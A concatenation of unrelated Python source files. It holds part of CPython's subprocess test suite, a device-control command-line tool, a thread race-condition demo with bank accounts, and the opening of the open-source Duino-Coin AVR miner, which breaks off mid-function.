p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
sys.exit(42)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
rc = p.wait()
self.assertEqual(rc, 42)
def test_send_signal(self):
self._kill_process('send_signal', signal.SIGTERM)
def test_kill(self):
self._kill_process('kill')
def test_terminate(self):
self._kill_process('terminate')
def test_send_signal_dead(self):
self._kill_dead_process('send_signal', signal.SIGTERM)
def test_kill_dead(self):
self._kill_dead_process('kill')
def test_terminate_dead(self):
self._kill_dead_process('terminate')
class MiscTests(unittest.TestCase):
class RecordingPopen(subprocess.Popen):
"""A Popen that saves a reference to each instance for testing."""
instances_created = []
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.instances_created.append(self)
@mock.patch.object(subprocess.Popen, "_communicate")
def _test_keyboardinterrupt_no_kill(self, popener, mock__communicate,
**kwargs):
"""Fake a SIGINT happening during Popen._communicate() and ._wait().
This avoids the need to actually try and get test environments to send
and receive signals reliably across platforms. The net effect of a ^C
happening during a blocking subprocess execution which we want to clean
up from is a KeyboardInterrupt coming out of communicate() or wait().
"""
mock__communicate.side_effect = KeyboardInterrupt
try:
with mock.patch.object(subprocess.Popen, "_wait") as mock__wait:
# We patch out _wait() as no signal was involved so the
# child process isn't actually going to exit rapidly.
mock__wait.side_effect = KeyboardInterrupt
with mock.patch.object(subprocess, "Popen",
self.RecordingPopen):
with self.assertRaises(KeyboardInterrupt):
popener([sys.executable, "-c",
"import time\ntime.sleep(9)\nimport sys\n"
"sys.stderr.write('\\n!runaway child!\\n')"],
stdout=subprocess.DEVNULL, **kwargs)
for call in mock__wait.call_args_list[1:]:
self.assertNotEqual(
call, mock.call(timeout=None),
"no open-ended wait() after the first allowed: "
f"{mock__wait.call_args_list}")
sigint_calls = []
for call in mock__wait.call_args_list:
if call == mock.call(timeout=0.25): # from Popen.__init__
sigint_calls.append(call)
self.assertLessEqual(mock__wait.call_count, 2,
msg=mock__wait.call_args_list)
self.assertEqual(len(sigint_calls), 1,
msg=mock__wait.call_args_list)
finally:
# cleanup the forgotten (due to our mocks) child process
process = self.RecordingPopen.instances_created.pop()
process.kill()
process.wait()
self.assertEqual([], self.RecordingPopen.instances_created)
def test_call_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.call, timeout=6.282)
def test_run_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.run, timeout=6.282)
def test_context_manager_keyboardinterrupt_no_kill(self):
def popen_via_context_manager(*args, **kwargs):
with subprocess.Popen(*args, **kwargs) as unused_process:
raise KeyboardInterrupt # Test how __exit__ handles ^C.
self._test_keyboardinterrupt_no_kill(popen_via_context_manager)
def test_getoutput(self):
self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy')
self.assertEqual(subprocess.getstatusoutput('echo xyzzy'),
(0, 'xyzzy'))
# we use mkdtemp in the next line to create an empty directory
# under our exclusive control; from that, we can invent a pathname
# that we _know_ won't exist. This is guaranteed to fail.
dir = None
try:
dir = tempfile.mkdtemp()
name = os.path.join(dir, "foo")
status, output = subprocess.getstatusoutput(
("type " if mswindows else "cat ") + name)
self.assertNotEqual(status, 0)
finally:
if dir is not None:
os.rmdir(dir)
def test__all__(self):
"""Ensure that __all__ is populated properly."""
intentionally_excluded = {"list2cmdline", "Handle"}
exported = set(subprocess.__all__)
possible_exports = set()
import types
for name, value in subprocess.__dict__.items():
if name.startswith('_'):
continue
if isinstance(value, (types.ModuleType,)):
continue
possible_exports.add(name)
self.assertEqual(exported, possible_exports - intentionally_excluded)
@unittest.skipUnless(hasattr(selectors, 'PollSelector'),
"Test needs selectors.PollSelector")
class ProcessTestCaseNoPoll(ProcessTestCase):
def setUp(self):
self.orig_selector = subprocess._PopenSelector
subprocess._PopenSelector = selectors.SelectSelector
ProcessTestCase.setUp(self)
def tearDown(self):
subprocess._PopenSelector = self.orig_selector
ProcessTestCase.tearDown(self)
@unittest.skipUnless(mswindows, "Windows-specific tests")
class CommandsWithSpaces (BaseTestCase):
def setUp(self):
super().setUp()
f, fname = tempfile.mkstemp(".py", "te st")
self.fname = fname.lower ()
os.write(f, b"import sys;"
b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
)
os.close(f)
def tearDown(self):
os.remove(self.fname)
super().tearDown()
def with_spaces(self, *args, **kwargs):
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(*args, **kwargs)
with p:
self.assertEqual(
p.stdout.read ().decode("mbcs"),
"2 [%r, 'ab cd']" % self.fname
)
def test_shell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"), shell=1)
def test_shell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)
def test_noshell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"))
def test_noshell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"])
class ContextManagerTests(BaseTestCase):
def test_pipe(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write('stdout');"
"sys.stderr.write('stderr');"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
self.assertEqual(proc.stdout.read(), b"stdout")
self.assertStderrEqual(proc.stderr.read(), b"stderr")
self.assertTrue(proc.stdout.closed)
self.assertTrue(proc.stderr.closed)
def test_returncode(self):
with subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(100)"]) as proc:
pass
# __exit__ calls wait(), so the returncode should be set
self.assertEqual(proc.returncode, 100)
def test_communicate_stdin(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.exit(sys.stdin.read() == 'context')"],
stdin=subprocess.PIPE) as proc:
proc.communicate(b"context")
self.assertEqual(proc.returncode, 1)
def test_invalid_args(self):
with self.assertRaises(NONEXISTING_ERRORS):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
def test_broken_pipe_cleanup(self):
"""Broken pipe error should not prevent wait() (Issue 21619)"""
proc = subprocess.Popen([sys.executable, '-c', 'pass'],
stdin=subprocess.PIPE,
bufsize=support.PIPE_MAX_SIZE*2)
proc = proc.__enter__()
# Prepare to send enough data to overflow any OS pipe buffering and
# guarantee a broken pipe error. Data is held in BufferedWriter
# buffer until closed.
proc.stdin.write(b'x' * support.PIPE_MAX_SIZE)
self.assertIsNone(proc.returncode)
# EPIPE expected under POSIX; EINVAL under Windows
self.assertRaises(OSError, proc.__exit__, None, None, None)
self.assertEqual(proc.returncode, 0)
self.assertTrue(proc.stdin.closed)
if __name__ == "__main__":
unittest.main()
|
cli.py
|
"""
Command line entry
"""
import os
import sys
import time
import threading
from os import getpid
import psutil
# from .web import Webserver
from ..models import WebserverArgs
from ..core.driver import (Driver, DriverEvents)
from ..core.device_context import DeviceContext
from ..core.tunnel_web import WebServer
from ..core.tunnel_base import TunnelEvents
from ..framework import AppLogger
from ..framework.utils import resource
from ..framework.constants import APP_TYPE
from ..framework.context import APP_CONTEXT
class CommandLine:
'''Command line entry class
'''
options = None
_tunnel = None
_driver = None
webserver_running = False
supported_commands = []
input_string = None
current_command = None
def __init__(self, **kwargs):
self._build_options(**kwargs)
APP_CONTEXT.mode = APP_TYPE.CLI
# self.communication = 'uart'
# self.device_provider = None
# self.communicator = None
# self.webserver = Webserver(**kwargs)
def listen(self):
'''
Prepare components, initialize the application
'''
# prepare driver
threading.Thread(target=self._prepare_driver).start()
        # prepare logger
self._prepare_logger()
def handle_discovered(self, device_provider):
device_context = DeviceContext(device_provider)
APP_CONTEXT.device_context = device_context
if self._tunnel:
self._tunnel.notify('discovered')
def handle_lost(self):
if self._tunnel:
self._tunnel.notify('lost')
def handle_upgrade_finished(self):
if self._tunnel:
self._tunnel.notify(
'continous', 'upgrade_complete', {'success': True})
def handle_upgrade_fail(self, code, message):
if self._tunnel:
self._tunnel.notify('continous', 'upgrade_complete', {
'success': False, 'code': code, 'message': message})
def handle_error(self, error, message):
if self._tunnel:
self._tunnel.notify('lost')
def handle_request(self, method, converted_method, parameters):
result = self._driver.execute(converted_method, parameters)
if self._tunnel:
self._tunnel.notify('invoke', method, result)
def handle_receive_continous_data(self, packet_type, data):
if self._tunnel:
self._tunnel.notify('continous', packet_type, data)
def _prepare_driver(self):
self._driver = Driver(self.options)
self._driver.on(DriverEvents.Discovered,
self.handle_discovered)
self._driver.on(DriverEvents.Lost,
self.handle_lost)
self._driver.on(DriverEvents.UpgradeFinished,
self.handle_upgrade_finished)
self._driver.on(DriverEvents.UpgradeFail,
self.handle_upgrade_fail)
self._driver.on(DriverEvents.Error,
self.handle_error)
self._driver.on(DriverEvents.Continous,
self.handle_receive_continous_data)
self._driver.detect()
self.setup_command_handler()
def _prepare_logger(self):
'''
Set default log handler: console logger, file logger
'''
executor_path = resource.get_executor_path()
log_level = 'info'
if self.options.debug:
log_level = 'debug'
console_log = self.options.console_log
APP_CONTEXT.set_logger(
AppLogger(
filename=os.path.join(executor_path, 'loggers', 'trace.log'),
gen_file=True,
level=log_level,
console_log=console_log
))
APP_CONTEXT.set_print_logger(
AppLogger(
filename=os.path.join(
executor_path, 'loggers', 'print_' + time.strftime('%Y%m%d_%H%M%S') + '.log'),
gen_file=True,
level=log_level
))
def setup_command_handler(self):
'''
Prepare command
'''
self.supported_commands = self._driver.execute('get_command_lines')
while True:
token = input(">>")
self.input_string = token.split(" ")
if token.strip() == 'exit':
break
if self.webserver_running and token.strip() != 'stop':
print("server is on-going, please stop it")
continue
for command in self.supported_commands:
if command['name'] == self.input_string[0]:
self.current_command = command
eval('self.%s()' % (command['function']))
break
else:
self.help_handler()
self.exit_handler()
return True
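    # Illustrative sketch only (not wired into the CLI above): the command loop
    # builds 'self.<function>()' strings and eval()s them; an equivalent
    # dispatch can use getattr(), which avoids evaluating constructed source
    # strings. The method name _dispatch_command is an assumption introduced
    # here, not part of the original code, and nothing calls it.
    def _dispatch_command(self, command):
        handler = getattr(self, command['function'], None)
        if callable(handler):
            return handler()
        return self.help_handler()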
def start_webserver(self):
'''
Start websocket server
'''
import tornado.ioloop
if sys.version_info[0] > 2:
import asyncio
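            # A new event loop is needed here because server_start_handler()
            # runs this method in a worker thread, and non-main threads have no
            # default asyncio event loop for Tornado's IOLoop.current() to use.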
asyncio.set_event_loop(asyncio.new_event_loop())
event_loop = tornado.ioloop.IOLoop.current()
self._tunnel = WebServer(self.options, event_loop)
self._tunnel.on(TunnelEvents.Request, self.handle_request)
self._tunnel.setup()
def _build_options(self, **kwargs):
self.options = WebserverArgs(**kwargs)
# command handler
def help_handler(self):
'''
Help handler
'''
if len(self.supported_commands) > 0:
print("Usage: ")
for command in self.supported_commands:
print(command['name'] + " : " + command['description'])
else:
print("No more command line.")
def connect_handler(self):
'''
        Connect to the device; this may not be needed later
'''
print(self._driver.execute('get_device_info'))
def upgrade_handler(self):
        '''The upgrade command performs a firmware upgrade; it is followed by the firmware file name
'''
input_args = len(self.input_string)
if input_args == 1:
print("Usage:")
print("upgrade file_name")
else:
file_name = self.input_string[1]
            # TODO: check that the device is idle
self._driver.execute('upgrade_framework', file_name)
return True
def record_handler(self):
        '''The record command saves the device outputs to the local machine
'''
        # TODO: check that the device is idle
if APP_CONTEXT.device_context.runtime_status != 'LOGGING':
self._driver.execute('start_data_log')
return True
def stop_handler(self):
        '''The stop command stops data logging and, if running, the websocket server
'''
        # TODO: check that the device is idle
if APP_CONTEXT.device_context.runtime_status == 'LOGGING':
self._driver.execute('stop_data_log')
if self.webserver_running:
self._tunnel.stop_ws_server()
self.webserver_running = False
return True
def get_handler(self):
'''
        Get a parameter from the device
'''
input_args = len(self.input_string)
conf = self._driver.execute('get_conf')
input_params_properties = conf['data']['inputParams']
select_param = None
if (input_args == 1):
print("Usage: get [options]")
print("Option: ")
i = 2
while i < len(input_params_properties):
print(input_params_properties[i]['argument'])
i += 1
return True
else:
i = 2
while i < len(input_params_properties):
select_param = input_params_properties[i]
if (select_param['argument'] == self.input_string[1]):
break
i += 1
if (i == len(input_params_properties)):
print("Usage: get [options]")
print("Option: ")
i = 2
while i < len(input_params_properties):
print(input_params_properties[i]['argument'])
i += 1
return True
param = self._driver.execute(
'get_param', {'paramId': select_param['paramId']})
print(param['data']['value'])
return True
def set_handler(self):
'''
        Set a parameter on the device
'''
input_args = len(self.input_string)
conf = self._driver.execute('get_conf')
input_params_properties = conf['data']['inputParams']
select_param = None
not_in_options = False
options = []
if input_args == 1:
print("Usage: set <options> <values>")
i = 2
while i < len(input_params_properties):
print(input_params_properties[i]['argument'])
i += 1
return True
else:
i = 2
while i < len(input_params_properties):
select_param = input_params_properties[i]
if (select_param['argument'] == self.input_string[1]):
break
i += 1
if input_args == 2:
if i == len(input_params_properties):
print("Usage: set <options> <values>")
i = 2
while i < len(input_params_properties):
print(input_params_properties[i]['argument'])
i += 1
else:
print("Usage: set " + select_param['argument'] + " <values>")
print("values: ")
print(select_param['options'])
return True
if select_param.__contains__('options'):
for item in select_param['options']:
if isinstance(item, dict):
options.append(int(item['key']))
else:
options.append(item)
if select_param['type'] == 'int64':
self.input_string[2] = int(self.input_string[2])
if select_param['type'] == "char8" and self.input_string[2] not in select_param['options']:
not_in_options = True
if select_param['type'] == "int64" and\
self.input_string[2] not in options:
not_in_options = True
if not_in_options:
print("Usage: set " + select_param['argument'] + " <values>")
print("values: ")
print(select_param['options'])
return True
conf = self._driver.execute('set_param', {
'paramId': select_param['paramId'],
'value': self.input_string[2]
})
# TODO: display a response message to user
return True
def save_handler(self):
'''
Save device configuration
'''
self._driver.execute('save_config')
return True
def server_start_handler(self):
'''
start a websocket server
'''
threading.Thread(target=self.start_webserver).start()
self.webserver_running = True
return True
def exit_handler(self):
'''
Exit current process
'''
# self.webserver.stop()
# self.webserver_running = False
pid = getpid()
process = psutil.Process(pid)
process.kill()
def run_handler(self):
        '''Run command handler; reserved for customer use
'''
return True
|
unsafe_bank.py
|
import datetime
import random
import time
from threading import Thread
from typing import List
class Account:
def __init__(self, balance=0):
self.balance = balance
def main():
accounts = create_accounts()
total = sum(a.balance for a in accounts)
validate_bank(accounts, total)
print("Starting transfers...")
jobs = [
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
]
t0 = datetime.datetime.now()
    for j in jobs:
        j.start()
    for j in jobs:
        j.join()
dt = datetime.datetime.now() - t0
print("Transfers complete ({:,.2f}) sec".format(dt.total_seconds()))
validate_bank(accounts, total)
def do_bank_stuff(accounts, total):
for _ in range(1, 10000):
a1, a2 = get_two_accounts(accounts)
amount = random.randint(1, 100)
do_transfer(a1, a2, amount)
validate_bank(accounts, total, quiet=True)
def create_accounts() -> List[Account]:
return [
Account(balance=5000),
Account(balance=10000),
Account(balance=7500),
Account(balance=7000),
Account(balance=6000),
Account(balance=9000),
]
def do_transfer(from_account: Account, to_account: Account, amount: int):
if from_account.balance < amount:
return
from_account.balance -= amount
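    # Deliberate pause point between the two balance updates: the pair of
    # writes is not atomic, so other threads can observe an inconsistent total
    # here, which is exactly what validate_bank() reports.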
time.sleep(.000)
to_account.balance += amount
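# Illustrative sketch only (not used by main() above): a thread-safe variant of
# do_transfer(). Serializing the two balance updates behind one shared lock
# removes the race demonstrated by this demo. The names _transfer_lock and
# do_transfer_locked are assumptions introduced here, not part of the original.
from threading import Lock
_transfer_lock = Lock()
def do_transfer_locked(from_account: Account, to_account: Account, amount: int):
    with _transfer_lock:
        if from_account.balance < amount:
            return
        from_account.balance -= amount
        to_account.balance += amount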
def validate_bank(accounts: List[Account], total: int, quiet=False):
current = sum(a.balance for a in accounts)
if current != total:
print("ERROR: Inconsistent account balance: ${:,} vs ${:,}".format(
current, total
), flush=True)
elif not quiet:
print("All good: Consistent account balance: ${:,}".format(
total), flush=True)
def get_two_accounts(accounts):
a1 = random.choice(accounts)
a2 = a1
while a2 == a1:
a2 = random.choice(accounts)
return a1, a2
if __name__ == '__main__':
main()
|
AVR_Miner.py
|
#!/usr/bin/env python3
##########################################
# Duino-Coin Python AVR Miner (v2.6.1)
# https://github.com/revoxhere/duino-coin
# Distributed under MIT license
# © Duino-Coin Community 2019-2021
##########################################
# Import libraries
import sys
from configparser import ConfigParser
from datetime import datetime
from json import load as jsonload
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
from os import _exit, execl, mkdir
from os import name as osname
from os import path
from os import system as ossystem
from platform import machine as osprocessor
from pathlib import Path
from platform import system
from re import sub
from signal import SIGINT, signal
from socket import socket
from subprocess import DEVNULL, Popen, check_call, call
from threading import Thread as thrThread
from threading import Lock
from time import ctime, sleep, strptime, time
from statistics import mean
from random import choice
import select
import pip
def install(package):
try:
pip.main(["install", package])
except AttributeError:
check_call([sys.executable, '-m', 'pip', 'install', package])
call([sys.executable, __file__])
def now():
# Return datetime object
return datetime.now()
try:
# Check if pyserial is installed
from serial import Serial
import serial.tools.list_ports
except ModuleNotFoundError:
print(
now().strftime('%H:%M:%S ')
+ 'Pyserial is not installed. '
+ 'Miner will try to install it. '
+ 'If it fails, please manually install "pyserial" python3 package.'
+ '\nIf you can\'t install it, use the Minimal-PC_Miner.')
install('pyserial')
try:
# Check if requests is installed
import requests
except ModuleNotFoundError:
print(
now().strftime('%H:%M:%S ')
+ 'Requests is not installed. '
+ 'Miner will try to install it. '
+ 'If it fails, please manually install "requests" python3 package.'
+ '\nIf you can\'t install it, use the Minimal-PC_Miner.')
install('requests')
try:
# Check if colorama is installed
from colorama import Back, Fore, Style, init
except ModuleNotFoundError:
print(
now().strftime('%H:%M:%S ')
+ 'Colorama is not installed. '
+ 'Miner will try to install it. '
+ 'If it fails, please manually install "colorama" python3 package.'
+ '\nIf you can\'t install it, use the Minimal-PC_Miner.')
install('colorama')
try:
# Check if pypresence is installed
from pypresence import Presence
except ModuleNotFoundError:
print(
now().strftime('%H:%M:%S ')
+ 'Pypresence is not installed. '
+ 'Miner will try to install it. '
+ 'If it fails, please manually install "pypresence" python3 package.'
+ '\nIf you can\'t install it, use the Minimal-PC_Miner.')
install('pypresence')
# Global variables
MINER_VER = '2.61' # Version number
SOC_TIMEOUT = 45
PERIODIC_REPORT_TIME = 60
AVR_TIMEOUT = 3.1 # diff 6 * 100 / 196 h/s = 3.06
BAUDRATE = 115200
RESOURCES_DIR = 'AVRMiner_' + str(MINER_VER) + '_resources'
shares = [0, 0]
hashrate_mean = []
ping_mean = []
diff = 0
shuffle_ports = "y"
donator_running = False
job = ''
debug = 'n'
discord_presence = 'y'
rig_identifier = 'None'
donation_level = 0
hashrate = 0
config = ConfigParser()
thread_lock = Lock()
mining_start_time = time()
# Create resources folder if it doesn't exist
if not path.exists(RESOURCES_DIR):
mkdir(RESOURCES_DIR)
# Check if languages file exists
if not Path(RESOURCES_DIR + '/langs.json').is_file():
url = ('https://raw.githubusercontent.com/'
+ 'revoxhere/'
+ 'duino-coin/master/Resources/'
+ 'AVR_Miner_langs.json')
r = requests.get(url)
with open(RESOURCES_DIR + '/langs.json', 'wb') as f:
f.write(r.content)
# Load language file
with open(RESOURCES_DIR + '/langs.json', 'r', encoding='utf8') as lang_file:
lang_file = jsonload(lang_file)
# OS X invalid locale hack
if system() == 'Darwin':
if getlocale()[0] is None:
setlocale(LC_ALL, 'en_US.UTF-8')
# Check if the miner is configured; if it isn't, autodetect the language
try:
if not Path(RESOURCES_DIR + '/Miner_config.cfg').is_file():
locale = getdefaultlocale()[0]
if locale.startswith('es'):
lang = 'spanish'
elif locale.startswith('sk'):
lang = 'slovak'
elif locale.startswith('ru'):
lang = 'russian'
elif locale.startswith('pl'):
lang = 'polish'
elif locale.startswith('fr'):
lang = 'french'
elif locale.startswith('tr'):
lang = 'turkish'
elif locale.startswith('pt'):
lang = 'portuguese'
elif locale.startswith('zh'):
lang = 'chinese_simplified'
elif locale.startswith('th'):
lang = 'thai'
else:
lang = 'english'
else:
try:
# Read language from configfile
config.read(RESOURCES_DIR + '/Miner_config.cfg')
lang = config['Duino-Coin-AVR-Miner']['language']
except Exception:
# If it fails, fallback to english
lang = 'english'
except:
lang = 'english'
def get_string(string_name: str):
# Get string from language file
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file['english']:
return lang_file['english'][string_name]
else:
return ' String not found: ' + string_name
def get_prefix(diff: int):
if int(diff) >= 1000000000:
diff = str(round(diff / 1000000000)) + "G"
elif int(diff) >= 1000000:
diff = str(round(diff / 1000000)) + "M"
elif int(diff) >= 1000:
diff = str(round(diff / 1000)) + "k"
return str(diff)
def debug_output(text: str):
# Debug output
if debug == 'y':
print(
Style.RESET_ALL
+ now().strftime(Style.DIM + '%H:%M:%S.%f ')
+ 'DEBUG: '
+ str(text))
def title(title: str):
# Window title
if osname == 'nt':
# Windows systems
ossystem('title ' + title)
else:
# Most standard terminals
print('\33]0;' + title + '\a', end='')
sys.stdout.flush()
def handler(signal_received, frame):
# SIGINT handler
pretty_print(
'sys0',
get_string('sigint_detected')
+ Style.NORMAL
+ Fore.RESET
+ get_string('goodbye'),
'warning')
try:
# Close previous socket connection (if any)
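        # Note: `socket` here is the class from `from socket import socket`,
        # not a connection object, so this close() has nothing to close; any
        # resulting error is swallowed by the except below.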
socket.close()
except Exception:
pass
_exit(0)
# Enable signal handler
signal(SIGINT, handler)
def load_config():
# Config loading section
global username
global donation_level
global avrport
global debug
global rig_identifier
global discord_presence
global shuffle_ports
global SOC_TIMEOUT
global AVR_TIMEOUT
global PERIODIC_REPORT_TIME
# Initial configuration section
if not Path(str(RESOURCES_DIR) + '/Miner_config.cfg').is_file():
print(
Style.BRIGHT
+ get_string('basic_config_tool')
+ RESOURCES_DIR
+ get_string('edit_config_file_warning'))
print(
Style.RESET_ALL
+ get_string('dont_have_account')
+ Fore.YELLOW
+ get_string('wallet')
+ Fore.RESET
+ get_string('register_warning'))
username = input(
Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ask_username')
+ Fore.RESET
+ Style.BRIGHT)
print(Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ports_message'))
portlist = serial.tools.list_ports.comports(include_links=True)
for port in portlist:
print(Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ ' '
+ str(port))
print(Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ports_notice'))
port_names = []
for port in portlist:
port_names.append(port.device)
avrport = ''
while True:
current_port = input(
Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ask_avrport')
+ Fore.RESET
+ Style.BRIGHT)
if current_port in port_names:
avrport += current_port
confirmation = input(
Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ask_anotherport')
+ Fore.RESET
+ Style.BRIGHT)
if confirmation == 'y' or confirmation == 'Y':
avrport += ','
else:
break
else:
print(Style.RESET_ALL
+ Fore.RED
+ 'Please enter a valid COM port from the list above')
rig_identifier = input(
Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ask_rig_identifier')
+ Fore.RESET
+ Style.BRIGHT)
if rig_identifier == 'y' or rig_identifier == 'Y':
rig_identifier = input(
Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ask_rig_name')
+ Fore.RESET
+ Style.BRIGHT)
else:
rig_identifier = 'None'
donation_level = '0'
#if osname == 'nt' or osname == 'posix':
# donation_level = input(
# Style.RESET_ALL
# + Fore.YELLOW
# + get_string('ask_donation_level')
# + Fore.RESET
# + Style.BRIGHT)
# Check whether donation_level is correct
donation_level = sub(r'\D', '', donation_level)
if donation_level == '':
donation_level = 1
if float(donation_level) > int(5):
donation_level = 5
if float(donation_level) < int(0):
donation_level = 0
# Format data
config['Duino-Coin-AVR-Miner'] = {
'username': username,
'avrport': avrport,
'donate': donation_level,
'language': lang,
'identifier': rig_identifier,
'debug': 'n',
"soc_timeout": 45,
"avr_timeout": 3.1,
"discord_presence": "y",
"periodic_report": 60,
"shuffle_ports": "y"
}
# Write data to file
with open(str(RESOURCES_DIR)
+ '/Miner_config.cfg', 'w') as configfile:
config.write(configfile)
avrport = avrport.split(',')
print(Style.RESET_ALL + get_string('config_saved'))
else: # If config already exists, load from it
config.read(str(RESOURCES_DIR) + '/Miner_config.cfg')
username = config['Duino-Coin-AVR-Miner']['username']
avrport = config['Duino-Coin-AVR-Miner']['avrport']
avrport = avrport.replace(" ", "").split(',')
donation_level = config['Duino-Coin-AVR-Miner']['donate']
debug = config['Duino-Coin-AVR-Miner']['debug']
rig_identifier = config['Duino-Coin-AVR-Miner']['identifier']
SOC_TIMEOUT = int(config["Duino-Coin-AVR-Miner"]["soc_timeout"])
AVR_TIMEOUT = float(config["Duino-Coin-AVR-Miner"]["avr_timeout"])
discord_presence = config["Duino-Coin-AVR-Miner"]["discord_presence"]
shuffle_ports = config["Duino-Coin-AVR-Miner"]["shuffle_ports"]
PERIODIC_REPORT_TIME = int(
config["Duino-Coin-AVR-Miner"]["periodic_report"])
def greeting():
# greeting message depending on time
global greeting
print(Style.RESET_ALL)
current_hour = strptime(ctime(time())).tm_hour
if current_hour < 12:
greeting = get_string('greeting_morning')
elif current_hour == 12:
greeting = get_string('greeting_noon')
elif current_hour > 12 and current_hour < 18:
greeting = get_string('greeting_afternoon')
elif current_hour >= 18:
greeting = get_string('greeting_evening')
else:
greeting = get_string('greeting_back')
# Startup message
print(
Style.DIM
+ Fore.MAGENTA
+ ' ‖ '
+ Fore.YELLOW
+ Style.BRIGHT
+ get_string('banner')
+ Style.RESET_ALL
+ Fore.MAGENTA
+ ' (v'
+ str(MINER_VER)
+ ') '
+ Fore.RESET
+ '2019-2021')
print(
Style.DIM
+ Fore.MAGENTA
+ ' ‖ '
+ Style.NORMAL
+ Fore.MAGENTA
+ 'https://github.com/revoxhere/duino-coin')
if lang != "english":
print(
Style.DIM
+ Fore.MAGENTA
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ lang.capitalize()
+ " translation: "
+ Fore.MAGENTA
+ get_string("translation_autor"))
print(
Style.DIM
+ Fore.MAGENTA
+ ' ‖ '
+ Style.NORMAL
+ Fore.RESET
+ get_string('avr_on_port')
+ Style.BRIGHT
+ Fore.YELLOW
+ ' '.join(avrport))
#if osname == 'nt' or osname == 'posix':
# print(
# Style.DIM
# + Fore.MAGENTA
# + ' ‖ '
# + Style.NORMAL
# + Fore.RESET
# + get_string('donation_level')
# + Style.BRIGHT
# + Fore.YELLOW
# + str(donation_level))
print(
Style.DIM
+ Fore.MAGENTA
+ ' ‖ '
+ Style.NORMAL
+ Fore.RESET
+ get_string('algorithm')
+ Style.BRIGHT
+ Fore.YELLOW
+ 'DUCO-S1A ⚙ AVR diff')
if rig_identifier != "None":
print(
Style.DIM
+ Fore.MAGENTA
+ ' ‖ '
+ Style.NORMAL
+ Fore.RESET
+ get_string('rig_identifier')
+ Style.BRIGHT
+ Fore.YELLOW
+ rig_identifier)
print(
Style.DIM
+ Fore.MAGENTA
+ ' ‖ '
+ Style.NORMAL
+ Fore.RESET
+ str(greeting)
+ ', '
+ Style.BRIGHT
+ Fore.YELLOW
+ str(username)
+ '!\n')
def init_rich_presence():
# Initialize Discord rich presence
global RPC
try:
RPC = Presence(808056068113563701)
RPC.connect()
debug_output('Discord rich presence initialized')
except Exception:
# Discord not launched
pass
def update_rich_presence():
# Update rich presence status
startTime = int(time())
while True:
try:
RPC.update(
details='Hashrate: ' + str(round(hashrate)) + ' H/s',
start=startTime,
state='Acc. shares: '
+ str(shares[0])
+ '/'
+ str(shares[0] + shares[1]),
large_image='ducol',
large_text='Duino-Coin, '
+ 'a coin that can be mined with almost everything, '
+ 'including AVR boards',
buttons=[
{'label': 'Learn more',
'url': 'https://duinocoin.com'},
{'label': 'Discord Server',
'url': 'https://discord.gg/k48Ht5y'}])
except Exception:
# Discord not launched
pass
# 15 seconds to respect Discord's rate limit
sleep(15)
def pretty_print(message_type, message, state):
# Print output messages in the DUCO 'standard'
# Usb/net/sys background
if message_type.startswith('net'):
background = Back.BLUE
elif message_type.startswith('usb'):
background = Back.MAGENTA
else:
background = Back.GREEN
# Text color
if state == 'success':
color = Fore.GREEN
elif state == 'warning':
color = Fore.YELLOW
else:
color = Fore.RED
with thread_lock:
print(Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + '%H:%M:%S ')
+ Style.BRIGHT
+ background
+ ' '
+ message_type
+ ' '
+ Back.RESET
+ color
+ Style.BRIGHT
+ message
+ Style.NORMAL
+ Fore.RESET)
def mine_avr(com, threadid):
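# One mining thread per serial port: connect to the node over TCP, request AVR jobs,
# forward them to the board over serial, read back the result, submit it to the node
# and print the accepted/rejected feedback.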
global hashrate
start_time = time()
report_shares = 0
while True:
try:
while True:
try:
# Default AVR mining port
debug_output('Connecting to ' +
str(NODE_ADDRESS + ":" + str(NODE_PORT)))
soc = socket()
soc.connect((str(NODE_ADDRESS), int(NODE_PORT)))
soc.settimeout(SOC_TIMEOUT)
server_version = soc.recv(100).decode()
if threadid == 0:
if float(server_version) <= float(MINER_VER):
pretty_print(
'net0',
get_string('connected')
+ Style.NORMAL
+ Fore.RESET
+ get_string('connected_server')
+ str(server_version)
